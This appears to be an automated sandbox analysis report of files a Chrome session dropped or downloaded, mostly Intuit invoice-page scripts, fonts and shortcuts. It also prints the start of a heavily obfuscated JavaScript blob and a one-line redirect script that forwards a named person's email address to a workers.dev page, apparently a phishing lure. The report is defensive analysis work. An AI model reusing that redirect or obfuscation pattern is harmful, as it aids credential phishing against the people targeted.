                                                Preview:L..................F.@.. ...$+.,....f...1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............(......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 15:38:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2675
                                                Entropy (8bit):4.002127188023127
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:38AD81B53D8E20ED57DF0587F720D882
                                                SHA1:5D2F9677A98147FA4C2B54BE4687AE1AF855B2EC
                                                SHA-256:DCB0B61D1AB8D9F1906A88A37599265A74A0092EAC2C8A6B93DB1C59AF886B73
                                                SHA-512:D2AB5FE74761F4F1EC3481AAEE060621A913B18CBF547FF150230608F7C8C3DA1E1DF83043B6659533F6CA81E03BFDE49AE25DD87C43829C429C263861656531
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,....rT..1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............(......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2689
                                                Entropy (8bit):4.0129251065661835
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8CEE6E930B557E26EE337E88F6BB12D3
                                                SHA1:70722FA4AF96F5C42D49CDA38931B0B44395CE4F
                                                SHA-256:ACBA17F0F8956664C9B7418D355C7639694480D93A04B9D6577045D00B2B9F50
                                                SHA-512:84550EFAB70A12046214FFCCC095AC9E9BABBC6FC0DC5A7F5C96E97516EA7691A55B961BFD663471C0AFB5A1919301D83C0E0FBF7F3C6BC96EEB2444DE948735
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............(......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 15:38:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):4.003810475643647
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:A089224887A545B6178C1434950289D1
                                                SHA1:DD0416A441C932DBD7372B449A6928C3C0720B39
                                                SHA-256:E118141D3017ABBA37E89C540F9A1C7CBE6AD74ABC5280E9F3FCAA3CAEB549FA
                                                SHA-512:6FF9482A37404A91F45DCCF9B8B0A3E37DCAC101CDFB44103F9DFD807F9B1323D420DC269A2136D668C7BCAE6F6CCF730EF7E57465B9515D6532DD5D92B22ACC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,......1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............(......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 15:38:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9922078261252536
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:38741DF58DDB9D073F2B3C7514F0C4C2
                                                SHA1:C5AF52F949577EE5CB4B9AEFD1E83C8E5ED8BA9A
                                                SHA-256:CF4453D963A555097D905396B9B49725C86D05EE684C51F043A4D5C95A55090A
                                                SHA-512:CE72CDD938D3C7676BF6AB654A6D8F564540D60C2ADCA7C9FF10D5A7F8281FA11BAEDD30492FBE88F2E89C5350E4FE1E02D24A44566FE70E91EEA258F57B984E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,.....G..1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............(......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 15:38:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):4.002057938768512
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:00390EE03BF8BAC3C1D68BE9EB45143E
                                                SHA1:CFE159FD9DF84B084CC7B9D23BC8ECAFF38A80D0
                                                SHA-256:A8771F60A48060763CF16BB4C13F6D9FB7998B5DCF0796DA039280C78251F429
                                                SHA-512:A4C34E2A8D997B9C072AAB255C2D55508F2D95D693AC050D3CC788DCEAB62DD91EFF5B41446A1B56ED7F75DE6565DE471341C01EC5AB9768EDC3967A6241F9EA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,........1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............(......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (32182)
                                                Category:dropped
                                                Size (bytes):32232
                                                Entropy (8bit):5.476436929383109
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:CF3732DC56F2CBA8AE38B2B25B629A34
                                                SHA1:87E89E479A1CB3729AB11A5AE1B1D89DB63E5F6A
                                                SHA-256:F3D14E4A7E6F9D9067927DD02410FBF6094C6D9DAB8F131BE0DE9B62FEC8940F
                                                SHA-512:C260293F4C03810222E02240EEAB976892BDEA0B22CEF570A576891DCA966D19F8F7A1D5AE3605B183D8FC7A8B854B1B3D5F950FDA9A6A7F15D2156D9F7FC5D2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3953],{59596:function(e,t,n){var s=n(95627),a=n.n(s),o=n(41664),i=n.n(o),r=n(67294),l=n(44012),c=n(23240),d=n(51245),p=n(2870),m=n(85893);const y="https://security.intuit.com/index.php/privacy",u="/termsOfService";t.ZP=e=>{let{redesign:t,companyLocale:n,isPayable:s,bottomPadding:o=0,topPadding:x=8}=e;const f=(new Date).getFullYear(),h=n.split("_")[1];return(0,m.jsxs)(r.Fragment,{children:[(0,m.jsxs)("div",{className:a().dynamic([["2870485114",[t?d.fontSize.xxxs:d.fontSize.xxs,d.colors.ghostGray,x,o,d.breakpoints.md]]])+" main-footer",children:[(0,m.jsx)(l.Z,{id:"INVOICE_ALL_RIGHT_RESERVED",values:{0:f},defaultMessage:`\xa9 ${f} Intuit Inc. All right reserved`}),(()=>{if(!s){const e=()=>{c.Z.clickPrivacy(),c.Z.transactionEngaged({activity_type:"optional_actions",ui_object:"link",ui_action:"clicked",ui_access_point:"transaction_flow",ui_object_detail:"privacy_statement"}),window.open(y,"_blank","noopener,noreferrer")};
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (22806)
                                                Category:downloaded
                                                Size (bytes):22859
                                                Entropy (8bit):5.561924095696689
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:EAFCF14B4A5CA1AAA4BFF0CE379CF4EE
                                                SHA1:115A589A33FCDC74FB25D139B085DD4AD35B08CA
                                                SHA-256:B77F2CBB7CC65B99164B5251480F30AEE84AB09D8963F6E28234B0630D861192
                                                SHA-512:C36DDAEB47A1FD5D1DEC70620C48A672B349C5C1AE140C1A99C2A5FCC1CF4187B8B6FDAE27BF25D046DDF9E20F1D54F773DF3417789EA840530FEBC080CC47CC
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/_next/static/chunks/pages/payable-8a6e7c86e06f5e82.js
                                                Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7908,712],{60712:function(e,t,a){"use strict";a.r(t);a(67294);var o=a(51245),n=a(85893);t.default=e=>{let{width:t=20,height:a=20,color:s=o.colors.lightBlue}=e;return(0,n.jsx)("svg",{width:t,height:a,viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,n.jsx)("path",{fillRule:"evenodd",clipRule:"evenodd",fill:s,d:"M9.99935 1.66797C14.6017 1.66797 18.3327 5.39893 18.3327 10.0013C18.3327 14.6036 14.6017 18.3346 9.99935 18.3346C5.39697 18.3346 1.66602 14.6036 1.66602 10.0013C1.66602 5.39893 5.39697 1.66797 9.99935 1.66797ZM9.99935 9.16797C9.5391 9.16797 9.16602 9.54105 9.16602 10.0013V12.5013L9.1716 12.5985C9.21977 13.013 9.57202 13.3346 9.99935 13.3346C10.4596 13.3346 10.8327 12.9616 10.8327 12.5013V10.0013L10.8271 9.90414C10.7789 9.48964 10.4267 9.16797 9.99935 9.16797ZM9.99935 6.66797C9.5391 6.66797 9.16602 7.04106 9.16602 7.5013C9.16602 7.96154 9.5391 8.33464 9.99935 8.33464C10.4596 8.33464 10.8327 7.961
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 35152, version 2.19660
                                                Category:downloaded
                                                Size (bytes):35152
                                                Entropy (8bit):7.994730947875104
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:476FE09CBBBBF74BA00B93F8595EE5ED
                                                SHA1:5260DB428DE67799090CB7D2B52DA6E7043F2F8D
                                                SHA-256:1EDB3E080320B633696D0516B223BCE282EA73951AAE0B24BA806CCE076AFF64
                                                SHA-512:8D8B3794AB2D351A6CD50524BFAE70B58832A85850B09645DF0CF475CE6D455C9C16FBC5AC4DB0B426D7D39201A18D1CF2BE2E23F5D7289192A80E76B6945E26
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/fonts/AvenirNext-forINTUIT-Web-Fonts/AvenirNext+forINTUIT+W05+Demi_web.woff2
                                                Preview:wOF2.......P..............L........................^....`..`.....d..P...D....6.$..(..,.. .... ../[.qq.=..Hx.m....Q......_.u.;?,..>..E|..mfD.|.d...g&.9,.Zr..`..?I..#..c`.c.5..)l.<...}.H.'_.......;.U.N..".=-.^.Kvq....+..t.#.......pw.W...`...U...j..D.....(..H.X....$zK.1....z..u..z.,..q.P..|.....A6..p..$..p....>...f..8...D..U..8....H/.....xMX..@..4.w~.f..h...,..P......8.r0%'.V.^....|......s.{....Q. .fm`ca-..q..E.FWF.......U...ca.d._...:..|...pD..8.+1.[......+]}6...(#.uE.......#s6......be..[... [2.~u........@@......Knw..*U..=A......y.nc.'.M..%G..|....d,P.1........J.c.Pn...{....-._.*...M.\...l_..l...."!.6E. $Y.S.)..._"........p0......8.WU...,...4...........TR...w....|?.i......~...Sg..'"K..qh..O..qwu...A..<.w. ...*........e.].. ..Fe....I...-.erW....)..Z......#.H.\.....v......R;.>.....~EN....al@......i..I/c<.B).9#c#E. S.....Uu.t..F.............UU.F......qd9rk}...y...JA.J.&Ju.D.E..R.V...9...`.p...V...G.#...s...'..0ZY .Q...vt.wi.[g.h.-..+z..`.......5;o..;.A.s.?aS.^+
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 507 x 613, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):69845
                                                Entropy (8bit):7.98836195394449
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:37CA2A2DAA06BF0053A222861203F51E
                                                SHA1:720B4733F57AC5EF26153F2FD1429E8271F591B0
                                                SHA-256:0CA8D16C37E191B7677392A537E5A5BC1DB705084D53650AD52174EE1DE77B49
                                                SHA-512:D0355D107C80C1FBA3704C82F9A824F61AA56FBA7E1CF094605595E2169BE299B83561C125F533B32D3214D8CA6E71CA40F2CEFDBC1575EF3D5BE55B19218F12
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......e.....Rm.+....iCCPICC Profile..X..YgX....%..$9.ArV.3K." AA@..EAED.Q.$QP.....Q."AT.......w.=....<;.n....U==]..p.........&.....]\..)@......Q/RT......?.....m|$........z..(...5....E.E.M.P...r4..]}.q..........>......].........#.i...^^d..hV.91...!P..e....C....E..............G.,../z...{yy......o.k.HOd`........?.?o.!1..~^<.:*....fA..O.2.C0....|M-~./FD....w.F..#...<..1q...c..t......w...`.0.V.f@. )J....X.Rb...o.....!..U.;..m....b...........y.....s....i.\..b.;.?"...m.k..X.a!{...~.G6.....F...m....&....E.M... sDq...."...%.@6.#.......({r...........]y.....o...*....d...A...D`....;...!2...!.L...y....b.1.g.dH..<..|..K..G.v ..C....?..9.Zhu..r.A>rh.....?....H_...~[....{....W..{..MF.5...?..:.%..?...1..k.5..a.P...{...T....Q.V...s.....(^.d.+......}A.._a...7/...... NP..H.0.....=..O...CK...FF.B.....]ha..h=.&.g..h.4..D+ ..Ek#1PD..D..g#..~z;..\...d......Z......@..h...[..!.......dd.........=.by..,\......?2.....!...?2...h...8I.!...... .:-.T... .D...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (1258)
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.452623430840307
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F69D3B30A1263332B5A03CD48576C018
                                                SHA1:DF7304DF5A2D0987DA1BA2DFBFBAC7D1550F3AE3
                                                SHA-256:0513FB180C36BB8F47AAB335FEC433BD9453F2EA6A73F30015FBA576296A21B5
                                                SHA-512:4E0145208A02723E9F0773FC41BF6DD16BB30C0731CDB326A59A4CFA7BF83A4921ADA98348BE8A07E1263F3DE5CA03B856A4DDFE30E0D5E3E957AF32ABFBBDCF
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1193],{61193:function(s,e,r){r.r(e);var t=r(95627),o=r.n(t),i=r(67294),n=r(51245),l=r(85893);e.default=s=>{let{width:e=12,height:r=15,color:t=n.colors.black,className:a="",strokeWidth:c=1}=s;return(0,l.jsxs)(i.Fragment,{children:[(0,l.jsx)(o(),{id:"4037661919",children:[".paylink-lock-icon.jsx-4037661919{position:relative;top:2px;}"]}),(0,l.jsx)("svg",{xmlns:"http://www.w3.org/2000/svg",width:e,height:r,viewBox:"0 0 12 15",className:"jsx-4037661919 "+(a||""),children:(0,l.jsxs)("g",{fill:"none",fillRule:"evenodd",transform:"translate(1 1)",className:"jsx-4037661919",children:[(0,l.jsx)("rect",{width:"10.165",height:"9",y:"4",stroke:t,strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:c,rx:"2",className:"jsx-4037661919"}),(0,l.jsx)("path",{stroke:t,strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:c,d:"M8.132 4V2.963C8.132 1.327 6.767 0 5.082 0 3.399 0 2.034 1.327 2.034 2.963V4",className:"jsx-4037661919"
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):414873
                                                Entropy (8bit):5.971052413051301
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:1FD96716050047F17E15B00E645BC77B
                                                SHA1:264541570C104B10E01922B5811F6CEEFF5DF09C
                                                SHA-256:E24CF206BBA15B9C7DA5A4C59F8C3D3C641FD21EE97815F9204BA61D3BA1EAF3
                                                SHA-512:55B7714DF767E090A86E719113D041D8E1D5B4F5CDF65DADD0C2D810DF0E19AF94597E54CC506C26D334DA8581A59FA4003D3B1A897D38A23476D7292712074F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:var _0xc9a22d=_0x5386;function _0x5386(_0x2480e7,_0xfc8633){var _0x3e65d7=_0x5cf7();return _0x5386=function(_0x356ca6,_0x470a02){_0x356ca6=_0x356ca6-0xe0;var _0x4c1580=_0x3e65d7[_0x356ca6];return _0x4c1580;},_0x5386(_0x2480e7,_0xfc8633);}(function(_0x295d12,_0x559525){var _0x3880c3=_0x5386,_0x7f5ecc=_0x295d12();while(!![]){try{var _0x5bf32c=-parseInt(_0x3880c3(0xe6))/0x1+-parseInt(_0x3880c3(0xf5))/0x2*(parseInt(_0x3880c3(0xe3))/0x3)+-parseInt(_0x3880c3(0xec))/0x4*(parseInt(_0x3880c3(0xf2))/0x5)+parseInt(_0x3880c3(0xf3))/0x6+-parseInt(_0x3880c3(0xeb))/0x7*(-parseInt(_0x3880c3(0xf9))/0x8)+-parseInt(_0x3880c3(0xe7))/0x9*(-parseInt(_0x3880c3(0xe2))/0xa)+-parseInt(_0x3880c3(0xf8))/0xb*(parseInt(_0x3880c3(0xed))/0xc);if(_0x5bf32c===_0x559525)break;else _0x7f5ecc['push'](_0x7f5ecc['shift']());}catch(_0x5cadfe){_0x7f5ecc['push'](_0x7f5ecc['shift']());}}}(_0x5cf7,0x6662b));var _0x2028b4=(function(){var _0x23e0d9=!![];return function(_0x5d1363,_0x1abaf6){var _0x18a1a5=_0x23e0d9?function(){var _0
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):117
                                                Entropy (8bit):4.661191872141112
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:BA12086CBA7AF5BD53DE35FC29B25B48
                                                SHA1:1D5B6406069F3A798587AC3DD9EC05AD696233BF
                                                SHA-256:ACAB9E8B8F8723BBDEB7E7E2667A74EC8C6A945F187E8750B2A83BF3C5657A42
                                                SHA-512:6A0538A11465E4376528B1A46C6CE3B5F61333FE060F63A81F29B5C49AEEFF0B57F8AFCA555DFB941D2A8E2925D0D8EBE5787EFB3DC4B4EAFC5CEE42A44731EB
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://outbound.knectit.co.uk/u/click/?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp
                                                Preview:<script>window.location.replace('https://non2famine.swerner3055.workers.dev/barry.doan@firstontariocu.com');</script>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (18482)
                                                Category:downloaded
                                                Size (bytes):18532
                                                Entropy (8bit):5.527556388049238
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:C77199C85AB7B66E992E696525485EF1
                                                SHA1:C4B829565F4BA3B418DE1B60FA0ACAEB559C513A
                                                SHA-256:1D22AD9BA1B98F1E4A7682531FF3E80D823DA69B43D533162E70A54FF2259429
                                                SHA-512:31DAA500AA957F60ED100DB676064E5E687BE30A9C27E96478BB3FA6F027A788C144E930D6AC2032497C1FEC5262AF6B32D4B98F3D5BA7907DE9EA548B010406
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/_next/static/chunks/7465-1b3ac9cfccea5cb5.js
                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7465],{99278:function(e,n,t){t.d(n,{Z:function(){return g}});var s=t(67294),o=t(95627),i=t.n(o),r=t(86896),a=t(44012),l=t(23240),c=t(85893),d=e=>{let{cdn:n,intl:t}=e;const s=t.formatMessage({id:"TRUSTE_IMG_ALT",defaultMessage:"Trust's online privacy certification"});return(0,c.jsx)("a",{href:"//privacy.truste.com/privacy-seal/validation?rid=6218d0ea-ee8b-4472-87dd-ba4bf95aab3d",title:"TRUSTe online privacy certification",target:"_blank",rel:"noopener noreferrer",onClick:()=>l.Z.clickTrust(),children:(0,c.jsx)("img",{src:`${n}/truste.svg`,alt:s})})},x=t(55146),m=t(70678),y=t(51245);var f=e=>{let{cdn:n}=e;const t=(0,r.Z)();return(0,c.jsxs)(s.Fragment,{children:[(0,c.jsx)("div",{className:i().dynamic([["755766305",[y.fontSize.xxs]]]),children:(0,c.jsx)(x.Z,{children:(0,c.jsxs)("div",{className:i().dynamic([["755766305",[y.fontSize.xxs]]])+" wrapper",children:[(0,c.jsxs)("div",{className:i().dynamic([["755766305",[y.font
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):77
                                                Entropy (8bit):4.37144473219773
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:downloaded
                                                Size (bytes):113620
                                                Entropy (8bit):5.2515241119772185
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:735CEDD9E9965F47F083877E3B2310EA
                                                SHA1:DDC5EFC13DC4A17A12FCEA0727792009D55F986E
                                                SHA-256:0ECB83F4473E366EB57632B19423D6D8113BB41B2B827B056BEB3EEEF45282AE
                                                SHA-512:02FA0F6AE0CC3DC985EA0474254225F253862FAE8D18BB1D89C201211572331BC856DFE26060E292672CB1A93433359912EE605B9262F1EA71CE43C2D73721DF
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.cns-icn-prod.a.intuit.com/_next/static/chunks/framework-560765ab0625ba27.js
